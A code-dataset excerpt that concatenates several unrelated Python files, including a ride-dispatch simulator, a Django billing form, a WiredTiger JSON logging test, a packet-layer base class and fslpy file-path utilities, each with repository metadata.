'''Send dispatched files to output, remove from data structures'''
if len(trip_buffer) < 1:
return trip_location_hash_table, trip_buffer
while len(trip_buffer) > 0:
next_to_dispatch_trip, next_to_dispatch_pickup_time = trip_buffer[0]
if floor(next_to_dispatch_pickup_time) <= floor(dispatch_time):
pickup_pixel = next_to_dispatch_trip.pickup_pixel
vehicle_id = next_to_dispatch_trip.vehicle_id
vehicles_log[vehicle_id].cumulative_person_miles += \
trip_ops.get_person_miles_of_joined_trip(trip_log, next_to_dispatch_trip.trip_id)
vehicles_log[vehicle_id].cumulative_vehicle_miles += \
trip_ops.get_vehicle_miles_of_joined_trip(trip_log, next_to_dispatch_trip.trip_id)
all_joined_trips = trip_ops.get_all_joined_trips(trip_log,
next_to_dispatch_trip.trip_id)
for that_trip in all_joined_trips:
assert(that_trip.valid()), "Trip being written is invalid" # this needs to be true
dict_writer.writerow(that_trip.__dict__)
del trip_log[that_trip.trip_id]
trip_buffer.popleft()
trip_location_hash_table[pickup_pixel].popleft()
else:
break
return
def receive_requests_now(reader, time, rollover_request):
'''Listen for requests at this time from the stream'''
if rollover_request is None:
requests_now = list()
else:
requests_now = [rollover_request]
while True:
try:
next_line = reader.next()
trip = trip_ops.process_cleaned_trip(next_line)
if trip.pickup_request_time > time:
return requests_now, trip
else:
requests_now.append(trip)
except StopIteration:
return None, None
def handle_all_trip_requests(constraints):
'''Main function'''
fleet_size = constraints['fleet_size']
beliefs = constraints['beliefs']
local_demand_degree = constraints['local_demand_degree']
freq_levrs = int(constraints['freq_levrs'])
cleaned_filepath = generic_ops.cleaned_fp(constraints['raw'])
result_filepath = generic_ops.results_fp(constraints['raw'], constraints['index'])
#-------------------------------------------------------- START READER OPS
inputfile = open(cleaned_filepath, 'rb')
reader = csv.DictReader(inputfile)
initial_trip_log = trip_ops.read_n_cleaned_trips(reader, fleet_size)
#-------------------------------------------------------- END READER OPS
#-------------------------------------------------------- START WRITER OPS
open(result_filepath, 'w').close() # reset the output file
outputfile = open(result_filepath, 'wa')
keys = initial_trip_log.values()[0].__dict__.keys()
dict_writer = csv.DictWriter(outputfile, keys)
dict_writer.writeheader()
for trip in initial_trip_log.values():
dict_writer.writerow(trip.__dict__)
#-------------------------------------------------------- END WRITER OPS
# trip_location_hash_table is a data structure that is a dict of trip origin points,
# each origin point contains a list of trips scheduled to leave from that point,
# represented solely by the trip that is the first-stop of that trip
# trip_buffer is a double-queue data structure that enqueues requests as they come in
# and dequeues them when they are dispatched.
# trip_log is a dict that is synced with the trip_buffer,
# contains more detailed info about trips
trip_location_hash_table = dict()
trip_buffer = deque()
# Transform Trip Log to Be Index By Vehicle ID
vehicles_log = initial_vehicle_log(initial_trip_log, fleet_size)
# Get time of last initial pickup request
start_time = initial_trip_log.values()[-1].pickup_request_time
# Clear this variable to save memory
initial_trip_log = None
trip_log = dict()
time = start_time
rollover_request = None
while True:
requests, rollover_request = receive_requests_now(reader, time, rollover_request)
# There are no incoming trip requests or trips left to dispatch. End Loop
if requests is None and len(trip_buffer) == 0:
break
# There are trip requests this turn. Process them.
if requests is not None and len(requests) >= 0:
trip_log, vehicles_log, beliefs = \
handle_requests_at_this_time(trip_log,
vehicles_log,
requests,
constraints,
trip_location_hash_table,
trip_buffer,
beliefs)
counter = 0
for pickup_pixel in trip_location_hash_table:
counter += len(trip_location_hash_table[pickup_pixel])
# Clear trips ready for dispatch at this time
clear_trips_for_dispatch(trip_log,
vehicles_log,
constraints,
trip_location_hash_table,
trip_buffer,
dict_writer)
# LEVRS Handling
if freq_levrs != 0 and time % freq_levrs == 0:
vehicles_log = \
handle_empty_repositioning(vehicles_log, time, beliefs, local_demand_degree)
time += 1 # next iteration of time
outputfile.close()
assert(len(trip_log) == 0), "There were %s undispatched trips." % (str(len(trip_log)))
return vehicles_log
| 0 | 0 | 0 |
914cfd77d3892cb4712872995721e9e8cf776aec | 1,212 | py | Python | core/forms.py | Jokotoye18/DjangoEcommerce | ce17e7a36cff72623f67eb01221bdec323ebfb31 | [
"MIT"
] | null | null | null | core/forms.py | Jokotoye18/DjangoEcommerce | ce17e7a36cff72623f67eb01221bdec323ebfb31 | [
"MIT"
] | 4 | 2021-03-30T14:22:12.000Z | 2021-06-10T19:35:45.000Z | core/forms.py | Jokotoye18/DjangoEcommerce | ce17e7a36cff72623f67eb01221bdec323ebfb31 | [
"MIT"
] | null | null | null | from django import forms
from .models import BillingAddress
from django_countries.fields import CountryField
from django_countries.widgets import CountrySelectWidget
PAYMENT_METHOD = (
('S', 'stripe'),
('P', 'paypal')
) | 46.615385 | 130 | 0.70132 | from django import forms
from .models import BillingAddress
from django_countries.fields import CountryField
from django_countries.widgets import CountrySelectWidget
PAYMENT_METHOD = (
('S', 'stripe'),
('P', 'paypal')
)
class BillingAddressForm(forms.ModelForm):
same_billing_address = forms.BooleanField(widget=forms.CheckboxInput(attrs={'class': 'custom-control-input'}), required=False)
save_info = forms.BooleanField(widget=forms.CheckboxInput(attrs={'class': 'custom-control-input'}), required=False)
payment_options = forms.ChoiceField(widget=forms.RadioSelect(), choices=PAYMENT_METHOD)
class Meta:
model = BillingAddress
fields = ['street_address', 'apartment_address', 'country', 'zip', 'same_billing_address', 'save_info', 'payment_options']
widgets = {
'street_address': forms.TextInput(attrs={'placeholder':'1234 Main St', 'class':'form-control'}),
'apartment_address': forms.TextInput(attrs={'placeholder':'Apartment or suite', 'class':'form-control'}),
'zip': forms.TextInput(attrs={'class':'form-control'}),
'country': CountrySelectWidget(attrs={'class': 'custom-select d-block w-100'})
} | 0 | 960 | 23 |
1059d59a682bc6b834dfb4596560d911b23842dc | 485 | py | Python | sea/contrib/extensions/celery/cmd.py | leesnhyun/sea | 40796be02b43ad1a1e79c54765b755fe67442e36 | [
"MIT"
] | null | null | null | sea/contrib/extensions/celery/cmd.py | leesnhyun/sea | 40796be02b43ad1a1e79c54765b755fe67442e36 | [
"MIT"
] | null | null | null | sea/contrib/extensions/celery/cmd.py | leesnhyun/sea | 40796be02b43ad1a1e79c54765b755fe67442e36 | [
"MIT"
] | null | null | null | import sys
from celery.__main__ import main as celerymain
from sea.cli import jobm
@jobm.job("async_task", proxy=True, help="invoke celery cmds for async tasks")
@jobm.job("bus", proxy=True, help="invoke celery cmds for bus")
| 21.086957 | 78 | 0.665979 | import sys
from celery.__main__ import main as celerymain
from sea.cli import jobm
def celery(argv, app):
sys.argv = (
["celery"] + argv + ["-A", "app.extensions:{app}".format(app=app)]
)
return celerymain()
@jobm.job("async_task", proxy=True, help="invoke celery cmds for async tasks")
def async_task(argv):
return celery(argv, "async_task")
@jobm.job("bus", proxy=True, help="invoke celery cmds for bus")
def bus(argv):
return celery(argv, "bus")
| 185 | 0 | 67 |
37788a8ca874e96f8e6c2587f107172bb4db2bb4 | 7,274 | py | Python | src/third_party/wiredtiger/test/suite/test_verbose03.py | benety/mongo | 203430ac9559f82ca01e3cbb3b0e09149fec0835 | [
"Apache-2.0"
] | null | null | null | src/third_party/wiredtiger/test/suite/test_verbose03.py | benety/mongo | 203430ac9559f82ca01e3cbb3b0e09149fec0835 | [
"Apache-2.0"
] | null | null | null | src/third_party/wiredtiger/test/suite/test_verbose03.py | benety/mongo | 203430ac9559f82ca01e3cbb3b0e09149fec0835 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
# Public Domain 2014-present MongoDB, Inc.
# Public Domain 2008-2014 WiredTiger, Inc.
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
from contextlib import contextmanager
import wiredtiger, wttest
from test_verbose01 import test_verbose_base
import json
# test_verbose03.py
# Tests that when enabling JSON-encoded messages through the event handler interface, valid JSON
# is produced. Valid messages are those that can be successfully parsed as JSON (meeting the JSON
# standard) and subscribe to an expected schema (i.e. meet expected fields and types).
if __name__ == '__main__':
wttest.run()
| 47.855263 | 135 | 0.678994 | #!/usr/bin/env python
#
# Public Domain 2014-present MongoDB, Inc.
# Public Domain 2008-2014 WiredTiger, Inc.
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
from contextlib import contextmanager
import wiredtiger, wttest
from test_verbose01 import test_verbose_base
import json
# test_verbose03.py
# Tests that when enabling JSON-encoded messages through the event handler interface, valid JSON
# is produced. Valid messages are those that can be successfully parsed as JSON (meeting the JSON
# standard) and subscribe to an expected schema (i.e. meet expected fields and types).
class test_verbose03(test_verbose_base):
# The maximum number of lines we will read from stdout/stderr in any given context.
nlines = 50000
@contextmanager
def expect_event_handler_json(self, config, expected_categories, stdErr=False):
# Clean the stdout/stderr resource before yielding the context to the execution block. We only want to
# capture the verbose output of the using context (ignoring any previous output up to this point).
if stdErr:
self.cleanStderr()
else:
self.cleanStdout()
# Create a new connection with JSON format enabled.
if stdErr:
conn_config = 'json_output=[error]'
else:
conn_config = 'json_output=[message]'
if config != "":
conn_config += "," + config
conn = self.wiredtiger_open(self.home, conn_config)
# Yield the connection resource to the execution context, allowing it to perform any necessary
# operations on the connection (for generating the expected message output).
yield conn
# Read the contents of stdout/stderr to extract our messages.
output = self.readStderr(self.nlines) if stdErr else self.readStdout(self.nlines)
# Split the output into their individual messages. We want validate the contents of each message
# to ensure we've only generated JSON messages.
messages = output.splitlines()
if len(output) >= self.nlines:
# If we've read the maximum number of characters, its likely that the last line is truncated ('...'). In this
# case, trim the last message as we can't parse it.
messages = messages[:-1]
# Test the contents of each verbose message, ensuring we can successfully parse the JSON and that is subscribes
# to the expected schema.
for line in messages:
try:
msg = json.loads(line)
except Exception as e:
self.pr('Unable to parse JSON message format: %s' % line)
raise e
self.validate_json_schema(msg)
self.validate_json_category(msg, expected_categories)
# Close the connection resource and clean up the contents of the stdout/stderr file, flushing out the
# verbose output that occurred during the execution of this context.
conn.close()
if stdErr:
self.cleanStderr()
else:
self.cleanStdout()
# Test use cases passing sets of verbose categories, ensuring the verbose messages follow a valid JSON schema.
def test_verbose_json_message(self):
# Close the initial connection. We will be opening new connections with different verbosity settings throughout
# this test.
self.close_conn()
expected_verbose_categories = {
'WT_VERB_API': wiredtiger.WT_VERB_API,
'WT_VERB_VERSION': wiredtiger.WT_VERB_VERSION,
}
# Test passing a single verbose category, 'api'.
with self.expect_event_handler_json(self.create_verbose_configuration(['api']), expected_verbose_categories) as conn:
# Perform a set of simple API operations (table creations and cursor operations) to generate verbose API
# messages.
uri = 'table:test_verbose03_api'
session = conn.open_session()
session.create(uri, 'key_format=S,value_format=S')
c = session.open_cursor(uri)
c['api'] = 'api'
c.close()
session.close()
# Test passing multiple verbose categories, being 'api' & 'version'.
with self.expect_event_handler_json(self.create_verbose_configuration(['api','version']), expected_verbose_categories) as conn:
# Perform a set of simple API operations (table creations and cursor operations) to generate verbose API
# messages. Beyond opening the connection resource, we shouldn't need to do anything special for the version
# category.
uri = 'table:test_verbose03_multiple'
session = conn.open_session()
session.create(uri, 'key_format=S,value_format=S')
c = session.open_cursor(uri)
c['multiple'] = 'multiple'
c.close()
# Test use cases generating error messages, ensuring the messages follow a valid JSON schema.
def test_verbose_json_err_message(self):
# Close the initial connection. We will be opening new connections with different verbosity settings throughout
# this test.
self.close_conn()
expected_verbose_categories = {
'WT_VERB_DEFAULT': wiredtiger.WT_VERB_DEFAULT,
}
# Test generating an error message, ensuring the JSON output is valid.
with self.expect_event_handler_json('', expected_verbose_categories, stdErr=True) as conn:
# Attempt to begin a read transaction with an invalid timestamp, inorder to produce an error message.
uri = 'table:test_verbose03_error'
session = conn.open_session()
session.create(uri, 'key_format=S,value_format=S')
c = session.open_cursor(uri)
try:
session.begin_transaction('read_timestamp=-1')
except wiredtiger.WiredTigerError:
# We intend to generate a WiredTigerError. Catch and move forward.
pass
c.close()
session.close()
if __name__ == '__main__':
wttest.run()
| 5,039 | 440 | 22 |
b69313242ff3954bc2e977fe3a858149821e416d | 257 | py | Python | app/api/db/petition_test_data.py | ChegeBryan/politico | 746ef4c76931928ef145593092c8b391421a50fd | [
"MIT"
] | 1 | 2021-09-08T13:17:03.000Z | 2021-09-08T13:17:03.000Z | app/api/db/petition_test_data.py | ChegeBryan/politico | 746ef4c76931928ef145593092c8b391421a50fd | [
"MIT"
] | 62 | 2019-02-04T07:08:32.000Z | 2021-05-06T19:49:03.000Z | app/api/db/petition_test_data.py | ChegeBryan/politico | 746ef4c76931928ef145593092c8b391421a50fd | [
"MIT"
] | 5 | 2019-02-11T18:21:14.000Z | 2022-02-25T07:41:07.000Z | # petition test dummy data
petition = {
"office": 1,
"contested_by": 2,
"body": "some string",
"evidence": ['https://image.url']
}
invalid_petition_data = {
"office": "Not integer",
"body": 2,
"evidence": "Not a list of url"
}
| 17.133333 | 37 | 0.571984 | # petition test dummy data
petition = {
"office": 1,
"contested_by": 2,
"body": "some string",
"evidence": ['https://image.url']
}
invalid_petition_data = {
"office": "Not integer",
"body": 2,
"evidence": "Not a list of url"
}
| 0 | 0 | 0 |
873a65b9ef155fde35bc54bd1a84d03fd2c17704 | 451 | py | Python | src/kedro_devops/pipelines/data_engineering/nodes/transform_uppercase.py | julianlrcsumz/kedro-devops | 873fbd35a1c47d1b97786e516d70b1b9ece83664 | [
"MIT"
] | null | null | null | src/kedro_devops/pipelines/data_engineering/nodes/transform_uppercase.py | julianlrcsumz/kedro-devops | 873fbd35a1c47d1b97786e516d70b1b9ece83664 | [
"MIT"
] | null | null | null | src/kedro_devops/pipelines/data_engineering/nodes/transform_uppercase.py | julianlrcsumz/kedro-devops | 873fbd35a1c47d1b97786e516d70b1b9ece83664 | [
"MIT"
] | 4 | 2021-10-15T13:36:53.000Z | 2021-11-12T16:16:50.000Z | import pandas as pd
from requests import Response
def transform_uppercase(data_set: Response) -> pd.DataFrame:
"""
Transform a lowercase dataframe to uppercase.
Args:
data (pd.DataFrame): A raw dataframe
Returns:
pd.DataFrame: An uppercase dataframe
"""
json_data = data_set.json()
pokemons = json_data.get("results")
data = pd.json_normalize(pokemons)
return data.applymap(lambda x: x.upper())
| 23.736842 | 60 | 0.68071 | import pandas as pd
from requests import Response
def transform_uppercase(data_set: Response) -> pd.DataFrame:
"""
Transform a lowercase dataframe to uppercase.
Args:
data (pd.DataFrame): A raw dataframe
Returns:
pd.DataFrame: An uppercase dataframe
"""
json_data = data_set.json()
pokemons = json_data.get("results")
data = pd.json_normalize(pokemons)
return data.applymap(lambda x: x.upper())
| 0 | 0 | 0 |
23660dc491a39ae78ddad366f825d8b7d3630c41 | 535 | py | Python | CURSO UDEMY/TEORICAS/5.py | CamilliCerutti/Exercicios-de-Python-curso-em-video | 6571a5c5cb7b4398352a7778c55588c0c16f13c2 | [
"MIT"
] | null | null | null | CURSO UDEMY/TEORICAS/5.py | CamilliCerutti/Exercicios-de-Python-curso-em-video | 6571a5c5cb7b4398352a7778c55588c0c16f13c2 | [
"MIT"
] | null | null | null | CURSO UDEMY/TEORICAS/5.py | CamilliCerutti/Exercicios-de-Python-curso-em-video | 6571a5c5cb7b4398352a7778c55588c0c16f13c2 | [
"MIT"
] | null | null | null | frase = 'O rato roeu a roupa do rei de roma'
tamanho = len(frase)
contador = 0
nova_string = ''
print(frase)
while True:
input_do_usuario = input('Qual letra voce deseja colocar maiuscula: ')
if input_do_usuario not in frase:
print('Escolha uma letra que esteja no texto')
else:
break
while contador < tamanho:
letra = frase[contador]
if letra == input_do_usuario:
nova_string += input_do_usuario.upper()
else:
nova_string += letra
contador += 1
print(nova_string) | 21.4 | 74 | 0.657944 | frase = 'O rato roeu a roupa do rei de roma'
tamanho = len(frase)
contador = 0
nova_string = ''
print(frase)
while True:
input_do_usuario = input('Qual letra voce deseja colocar maiuscula: ')
if input_do_usuario not in frase:
print('Escolha uma letra que esteja no texto')
else:
break
while contador < tamanho:
letra = frase[contador]
if letra == input_do_usuario:
nova_string += input_do_usuario.upper()
else:
nova_string += letra
contador += 1
print(nova_string) | 0 | 0 | 0 |
9cf65e28a279c6041cf2dd8a3d2c3545e5e2c9ed | 2,994 | py | Python | Layer.py | orishamir/OriScapy | 68acbe9c4ccefcdf611de58277e64a4055111a58 | [
"MIT"
] | null | null | null | Layer.py | orishamir/OriScapy | 68acbe9c4ccefcdf611de58277e64a4055111a58 | [
"MIT"
] | null | null | null | Layer.py | orishamir/OriScapy | 68acbe9c4ccefcdf611de58277e64a4055111a58 | [
"MIT"
] | null | null | null | from abc import ABCMeta, abstractmethod
from colorama import init, Fore, Style
RST = Style.RESET_ALL
init() | 31.851064 | 147 | 0.514696 | from abc import ABCMeta, abstractmethod
from colorama import init, Fore, Style
RST = Style.RESET_ALL
init()
class Layer(metaclass=ABCMeta):
def __truediv__(self, other):
if hasattr(self, 'data'):
self.data = self.data / other
else:
self.data = other
return self
def __rtruediv__(self, other):
self.data = other
return self
def __itruediv__(self, other):
return self / other
def __str__(self):
#self._autocomplete()
ret = f" {Fore.LIGHTRED_EX}\033[1m[{self.__class__.__name__}]{RST} \n"
all_attr = self.__dict__
for key, val in all_attr.items():
if key == 'data':
continue
if key in ("lladdr", ):
continue
if 'port' not in key and key != 'ttl' and key not in ['qd', 'an', 'ns', 'ar'] and val not in (0,1) and isinstance(val, int):
val = hex(val)
if key in ('qd', 'an') and val:
ret += f" {Fore.MAGENTA}{key}{RST}="
for dnsr in val:
dnsr = f'\n{" "*12}'.join(str(dnsr).split('\n'))
ret += f" {Fore.LIGHTGREEN_EX} {dnsr}{RST}\n"
elif key == '_options':
ret += f" {Fore.MAGENTA}options{RST}="
else:
ret += f" {Fore.MAGENTA}{key:<15} {RST}={Fore.LIGHTGREEN_EX} {val}{RST}\n"
if (hasattr(self, 'data') and not isinstance(self.data, bytes) and self.data is not None) or (hasattr(self, '_options') and self._options):
ret += '\n'
if hasattr(self, 'data'):
s = str(self.data)
elif hasattr(self, '_options'):
s = ''
for opt in self._options:
s += f"{opt}\n"
s = [f" {i}" for i in s.splitlines()]
ret += '\n '.join(s)
return ret
def __contains__(self, item):
if isinstance(self, item):
return True
if not hasattr(self, 'data'):
return False
if isinstance(self.data, bytes):
return False
return item in self.data
def __getitem__(self, item):
if item not in self:
raise KeyError(f"{item.__name__} does not exist.")
if isinstance(self, item):
return self
return self.data[item]
def __getattr__(self, name):
"""
Custom functionality of pkt.attr, so for example
IP attributes are accessible from Ether layer forward
:param name: str
:return:
"""
if name in self.__dict__:
return self.__dict__[name]
if 'data' not in self.__dict__:
raise AttributeError(f"No attribute {name}")
return getattr(self.data, name)
def __len__(self):
return len(bytes(self))
def _autocomplete(self):
pass
def __bytes__(self):
return | 2,183 | 681 | 23 |
0a0859528945a7b944482442b0ffc658d0dc05f9 | 18,295 | py | Python | fsl/utils/path.py | physimals/fslpy | 10dd3f996c79d402c65cf0af724b8b00082d5176 | [
"Apache-2.0"
] | null | null | null | fsl/utils/path.py | physimals/fslpy | 10dd3f996c79d402c65cf0af724b8b00082d5176 | [
"Apache-2.0"
] | null | null | null | fsl/utils/path.py | physimals/fslpy | 10dd3f996c79d402c65cf0af724b8b00082d5176 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
# path.py - Utility functions for working with file/directory paths.
#
# Author: Paul McCarthy <pauldmccarthy@gmail.com>
#
"""This module contains a few utility functions for working with file system
paths.
.. autosummary::
:nosignatures:
deepest
shallowest
allFiles
hasExt
addExt
removeExt
getExt
splitExt
getFileGroup
removeDuplicates
uniquePrefix
commonBase
wslpath
winpath
"""
import os.path as op
import os
import glob
import operator
import re
from fsl.utils.platform import platform
class PathError(Exception):
"""``Exception`` class raised by the functions defined in this module
when something goes wrong.
"""
pass
def deepest(path, suffixes):
"""Finds the deepest directory which ends with one of the given
sequence of suffixes, or returns ``None`` if no directories end
with any of the suffixes.
"""
path = path.strip()
if path == op.sep or path == '':
return None
path = path.rstrip(op.sep)
if any([path.endswith(s) for s in suffixes]):
return path
return deepest(op.dirname(path), suffixes)
def shallowest(path, suffixes):
"""Finds the shallowest directory which ends with one of the given
sequence of suffixes, or returns ``None`` if no directories end
with any of the suffixes.
"""
path = path.strip()
# We've reached the root of the file system
if path == op.sep or path == '' or op.splitdrive(path)[1] == '':
return None
path = path.rstrip(op.sep)
parent = shallowest(op.dirname(path), suffixes)
if parent is not None:
return parent
if any([path.endswith(s) for s in suffixes]):
return path
return None
def allFiles(root):
"""Return a list containing all files which exist underneath the specified
``root`` directory.
"""
files = []
for dirpath, _, filenames in os.walk(root):
filenames = [op.join(dirpath, f) for f in filenames]
files.extend(filenames)
return files
def hasExt(path, allowedExts):
"""Convenience function which returns ``True`` if the given ``path``
ends with any of the given ``allowedExts``, ``False`` otherwise.
"""
return any([path.endswith(e) for e in allowedExts])
def addExt(prefix,
allowedExts=None,
mustExist=True,
defaultExt=None,
fileGroups=None,
unambiguous=True):
"""Adds a file extension to the given file ``prefix``.
If ``mustExist`` is False, and the file does not already have a
supported extension, the default extension is appended and the new
file name returned. If the prefix already has a supported extension,
it is returned unchanged.
If ``mustExist`` is ``True`` (the default), the function checks to see
if any files exist that have the given prefix, and a supported file
extension. A :exc:`PathError` is raised if:
- No files exist with the given prefix and a supported extension.
- ``fileGroups is None`` and ``unambiguous is True``, and more than
one file exists with the given prefix, and a supported extension.
Otherwise the full file name is returned.
:arg prefix: The file name prefix to modify.
:arg allowedExts: List of allowed file extensions.
:arg mustExist: Whether the file must exist or not.
:arg defaultExt: Default file extension to use.
:arg fileGroups: Recognised file groups - see :func:`getFileGroup`.
:arg unambiguous: If ``True`` (the default), and more than one file
exists with the specified ``prefix``, a
:exc:`PathError` is raised. Otherwise, a list
containing *all* matching files is returned.
"""
if allowedExts is None: allowedExts = []
if fileGroups is None: fileGroups = {}
if defaultExt is not None and defaultExt not in allowedExts:
allowedExts.append(defaultExt)
if not mustExist:
# the provided file name already
# ends with a supported extension
if hasExt(prefix, allowedExts):
return prefix
if defaultExt is not None: return prefix + defaultExt
else: return prefix
# If no allowed extensions were
# provided, or the provided prefix
# already ends with a supported
# extension, check to see that it
# exists.
if len(allowedExts) == 0 or hasExt(prefix, allowedExts):
allPaths = [prefix]
# Otherwise, make a bunch of file names, one per
# supported extension, and test to see if exactly
# one of them exists.
else:
allPaths = [prefix + ext for ext in allowedExts]
allPaths = [p for p in allPaths if op.isfile(p)]
nexists = len(allPaths)
# Could not find any supported file
# with the specified prefix
if nexists == 0:
raise PathError('Could not find a supported file '
'with prefix "{}"'.format(prefix))
# If ambiguity is ok, return
# all matching paths
elif not unambiguous:
return allPaths
# Ambiguity is not ok! More than
# one supported file with the
# specified prefix.
elif nexists > 1:
# Remove non-existent paths from the
# extended list, get all their
# suffixes, and see if they match
# any file groups.
suffixes = [getExt(p, allowedExts) for p in allPaths]
groupMatches = [sorted(suffixes) == sorted(g) for g in fileGroups]
# Is there a match for a file suffix group?
# If not, multiple files with the specified
# prefix exist, and there is no way to
# resolve the ambiguity.
if sum(groupMatches) != 1:
raise PathError('More than one file with '
'prefix "{}"'.format(prefix))
# Otherwise, we return a path
# to the file which matches the
# first suffix in the group.
groupIdx = groupMatches.index(True)
allPaths = [prefix + fileGroups[groupIdx][0]]
# Return the full file name of the
# supported file that was found
return allPaths[0]
def removeExt(filename, allowedExts=None, firstDot=False):
"""Returns the base name of the given file name. See :func:`splitExt`. """
return splitExt(filename, allowedExts, firstDot)[0]
def getExt(filename, allowedExts=None, firstDot=False):
"""Returns the extension of the given file name. See :func:`splitExt`. """
return splitExt(filename, allowedExts, firstDot)[1]
def splitExt(filename, allowedExts=None, firstDot=False):
"""Returns the base name and the extension from the given file name.
If ``allowedExts`` is ``None`` and ``firstDot`` is ``False``, this
function is equivalent to using::
os.path.splitext(filename)
If ``allowedExts`` is ``None`` and ``firstDot`` is ``True``, the file
name is split on the first period that is found, rather than the last
period. For example::
splitExt('image.nii.gz') # -> ('image.nii', '.gz')
splitExt('image.nii.gz', firstDot=True) # -> ('image', '.nii.gz')
If ``allowedExts`` is provided, ``firstDot`` is ignored. In this case, if
the file does not end with an allowed extension, a tuple containing
``(filename, '')`` is returned.
:arg filename: The file name to split.
:arg allowedExts: Allowed/recognised file extensions.
:arg firstDot: Split the file name on the first period, rather than the
last period. Ignored if ``allowedExts`` is specified.
"""
# If allowedExts is not specified
# we split on a period character
if allowedExts is None:
# split on last period - equivalent
# to op.splitext
if not firstDot:
return op.splitext(filename)
# split on first period
else:
idx = filename.find('.')
if idx == -1:
return filename, ''
else:
return filename[:idx], filename[idx:]
# Otherwise, try and find a suffix match
extMatches = [filename.endswith(ext) for ext in allowedExts]
# No match, assume there is no extension
if not any(extMatches):
return filename, ''
# Otherwise split the filename
# into its base and its extension
extIdx = extMatches.index(True)
extLen = len(allowedExts[extIdx])
return filename[:-extLen], filename[-extLen:]
def getFileGroup(path,
allowedExts=None,
fileGroups=None,
fullPaths=True,
unambiguous=False):
"""If the given ``path`` is part of a ``fileGroup``, returns a list
containing the paths to all other files in the group (including the
``path`` itself).
If the ``path`` does not appear to be part of a file group, or appears to
be part of an incomplete file group, a list containing only the ``path``
is returned.
If the ``path`` does not exist, or appears to be part of more than one
file group, a :exc:`PathError` is raised.
File groups can be used to specify a collection of file suffixes which
should always exist alongside each other. This can be used to resolve
ambiguity when multiple files exist with the same ``prefix`` and supported
extensions (e.g. ``file.hdr`` and ``file.img``). The file groups are
specified as a list of sequences, for example::
[('.img', '.hdr'),
('.img.gz', '.hdr.gz')]
If you specify ``fileGroups=[('.img', '.hdr')]`` and ``prefix='file'``, and
both ``file.img`` and ``file.hdr`` exist, the :func:`addExt` function would
return ``file.img`` (i.e. the file which matches the first extension in
the group).
Similarly, if you call the :func:`.imcp.imcp` or :func:`.imcp.immv`
functions with the above parameters, both ``file.img`` and ``file.hdr``
will be moved.
.. note:: The primary use-case of file groups is to resolve ambiguity with
respect to NIFTI and ANALYSE75 image pairs. By specifying
``fileGroups=[('.img', '.hdr'), ('.img.gz', '.hdr.gz')]``, the
:func:`addExt`, :func:`.imcp.immv` and :func:`.imcp.imcp`
functions are able to figure out what you mean when you specify
``file``, and both ``file.hdr`` and ``file.img`` (or
``file.hdr.gz`` and ``file.img.gz``) exist.
:arg path: Path to the file. Must contain the file extension.
:arg allowedExts: Allowed/recognised file extensions.
:arg fileGroups: Recognised file groups.
:arg fullPaths: If ``True`` (the default), full file paths (relative to
the ``path``) are returned. Otherwise, only the file
extensions in the group are returned.
:arg unambiguous: Defaults to ``False``. If ``True``, and the path
is not unambiguously part of one group, or part of
no groups, a :exc:`PathError` is raised.
Otherwise, the path is returned.
"""
path = addExt(path, allowedExts, mustExist=True, fileGroups=fileGroups)
base, ext = splitExt(path, allowedExts)
if fileGroups is None:
if fullPaths: return [path]
else: return [ext]
matchedGroups = []
matchedGroupFiles = []
fullMatches = 0
partialMatches = 0
for group in fileGroups:
if ext != '' and ext not in group:
continue
groupFiles = [base + s for s in group]
exist = [op.exists(f) for f in groupFiles]
if any(exist):
partialMatches += 1
if all(exist):
fullMatches += 1
matchedGroups .append(group)
matchedGroupFiles.append(groupFiles)
# Path is not part of any group
if partialMatches == 0:
if fullPaths: return [path]
else: return [ext]
# If the given path is part of more
# than one existing file group, we
# can't resolve this ambiguity.
if fullMatches > 1:
raise PathError('Path is part of multiple '
'file groups: {}'.format(path))
# If the unambiguous flag is not set,
# we don't care about partial matches
if not unambiguous:
partialMatches = 0
# The path is unambiguously part of a
# complete file group - resolve it to
# the first element of the group
if fullMatches == 1 and partialMatches <= 1:
if fullPaths: return matchedGroupFiles[0]
else: return matchedGroups[ 0]
# The path appears to be part of
# an incomplete group - this is
# potentially ambiguous, so give
# up (but see the partialMatches
# clobber above).
elif partialMatches > 0:
raise PathError('Path is part of an incomplete '
'file group: {}'.format(path))
else:
if fullPaths: return [path]
else: return [ext]
def removeDuplicates(paths, allowedExts=None, fileGroups=None):
"""Reduces the list of ``paths`` down to those which are unique with
